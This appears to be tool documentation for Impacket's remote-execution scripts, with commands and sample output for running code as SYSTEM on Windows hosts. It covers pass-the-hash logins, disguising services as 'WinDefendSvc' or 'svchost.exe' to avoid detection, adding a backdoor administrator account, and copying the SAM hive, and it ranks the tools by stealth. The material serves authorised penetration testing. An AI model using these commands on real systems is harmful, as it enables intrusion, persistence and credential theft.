Skip to main content
Impacket provides multiple methods for executing commands on remote Windows systems, each using different protocols and execution contexts.

Tool Comparison

ToolProtocolContextStealthRequirements
psexec.pySMB + RemComSvcSYSTEMLowAdmin, SMB access
smbexec.pySMB + ServiceSYSTEMLowAdmin, SMB access
wmiexec.pyWMI/DCOMUserMediumAdmin, DCOM ports
dcomexec.pyDCOM ObjectsUserMediumAdmin, DCOM ports
atexec.pyTask SchedulerSYSTEMMediumAdmin, Task Scheduler

psexec.py

PsExec-like functionality using RemComSvc. Executes commands as SYSTEM through a temporary service.

Basic Usage

# Password authentication
psexec.py DOMAIN/username:password@target

# Pass-the-hash
psexec.py DOMAIN/username@target -hashes :NTHASH

# Kerberos authentication
psexec.py DOMAIN/username@target -k -no-pass -dc-ip DC_IP

Advanced Options

# Custom service name (avoid detection)
psexec.py domain/user@target -service-name WinDefendSvc

# Custom remote binary name
psexec.py domain/user@target -remote-binary-name svchost.exe

# Upload and execute binary
psexec.py domain/user@target -copy-file payload.exe

# Execute with arguments
psexec.py domain/user@target -copy-file tool.exe "arg1 arg2"

# Custom SMB port
psexec.py domain/user@target -port 8445

# Target IP (when DNS fails)
psexec.py domain/user@hostname -target-ip 10.0.0.5

Example Output

$ psexec.py CORP/admin:[email protected]
Impacket v0.12.0 - Copyright 2023 Fortra

[*] Requesting shares on 10.0.0.50.....
[*] Found writable share ADMIN$
[*] Uploading file HjKDpnmR.exe
[*] Opening SVCManager on 10.0.0.50.....
[*] Creating service RemComSvc on 10.0.0.50.....
[*] Starting service RemComSvc.....
[!] Press help for extra shell commands

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
WIN-SERVER01

smbexec.py

Executes commands through a temporary service without uploading a binary. Uses local SMB server in server mode.

Basic Usage

# Use existing writable share
smbexec.py DOMAIN/user:pass@target -share C$
smbexec.py DOMAIN/user@target -hashes :HASH -share ADMIN$

# Auto-detect writable share
smbexec.py DOMAIN/user:pass@target

Characteristics

Advantages

  • No binary upload required
  • Works with any writable share
  • Server mode for restricted environments

Disadvantages

  • Generates event logs (service creation)
  • Commands timeout if they run too long
  • Not fully interactive

Example

$ smbexec.py CORP/[email protected] -hashes :8846f7eaee8fb117ad06bdd830b7586c
Impacket v0.12.0 - Copyright 2023 Fortra

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32> net user attacker P@ssw0rd! /add
The command completed successfully.

C:\Windows\system32> net localgroup administrators attacker /add
The command completed successfully.

wmiexec.py

Executes commands through WMI. Runs as the authenticated user (not SYSTEM) with less event log noise.

Basic Usage

# Standard authentication
wmiexec.py DOMAIN/user:password@target

# Pass-the-hash
wmiexec.py DOMAIN/user@target -hashes LMHASH:NTHASH

# Kerberos
wmiexec.py DOMAIN/user@target -k -no-pass

Advanced Features

# CMD shell (default)
wmiexec.py domain/user:pass@target

# PowerShell shell
wmiexec.py domain/user:pass@target -shell-type powershell

# Execute single PowerShell command
wmiexec.py domain/user:pass@target -shell-type powershell "Get-Process"

# Use specific share for output
wmiexec.py domain/user:pass@target -share C$
wmiexec.py domain/user:pass@target -share ADMIN$

# Upload file
C:\> lput /local/file.txt C:\Windows\Temp\file.txt

# Download file
C:\> lget C:\Windows\System32\config\SAM

# Change local directory
C:\> lcd /tmp

Example Session

$ wmiexec.py CORP/admin:P@[email protected]
Impacket v0.12.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

C:\> whoami
corp\admin

C:\> powershell -c "Get-WmiObject Win32_OperatingSystem | Select Caption"
Caption
-------
Microsoft Windows Server 2019 Standard

dcomexec.py

Executes commands through DCOM objects. Supports multiple DCOM methods.

DCOM Objects

# Default method (Windows 7/10/Server 2012R2+)
dcomexec.py DOMAIN/user:pass@target
dcomexec.py DOMAIN/user:pass@target -object MMC20

Usage Examples

# Interactive shell with MMC20
dcomexec.py CORP/[email protected] -hashes :NTHASH

# Single command execution
dcomexec.py CORP/admin:pass@target -object ShellWindows "whoami"

# PowerShell shell
dcomexec.py CORP/admin@target -hashes :HASH -shell-type powershell

# No output mode
dcomexec.py CORP/admin:pass@target -nooutput "command"

atexec.py

Executes commands via Task Scheduler. Runs as SYSTEM with less noise than service-based methods.

Basic Usage

# Execute command and retrieve output
atexec.py DOMAIN/user:password@target "whoami"
atexec.py DOMAIN/user@target -hashes :HASH "ipconfig /all"

Example

$ atexec.py CORP/admin:P@[email protected] "whoami"
Impacket v0.12.0 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \hKtMjRxL
[*] Running task \hKtMjRxL
[*] Deleting task \hKtMjRxL
[*] Attempting to read ADMIN$\Temp\hKtMjRxL.tmp
nt authority\system

Choosing the Right Tool

Most Stealthy to Least:
  1. wmiexec.py - Minimal event logs, runs as user
  2. dcomexec.py - DCOM-based, less common detection
  3. atexec.py - Task Scheduler, moderate logging
  4. smbexec.py - Service creation logs
  5. psexec.py - Service creation + binary upload

Common Issues

# Verify credentials work
crackmapexec smb target -u user -p password

# Check if user is local admin
crackmapexec smb target -u user -p password --local-auth

# Try different authentication method
tool.py domain/user@target -hashes :NTHASH

# Test SMB connectivity (445)
nc -zv target 445

# Test WMI/DCOM ports (135, 49152-65535)
nmap -p 135,445 target

# Use specific target IP
tool.py domain/user@hostname -target-ip 10.0.0.5

# Ensure DCOM is enabled on target
# Check firewall allows ports 135 + dynamic RPC

# Try different DCOM object
dcomexec.py domain/user@target -object ShellWindows

# Fall back to SMB-based method
smbexec.py domain/user@target

Next Steps

Credential Dumping

Extract credentials after gaining access

SMB Operations

Browse shares and access files

LDAP Operations

Enumerate and modify Active Directory

Build docs developers (and LLMs) love

Get started for freeTalk to us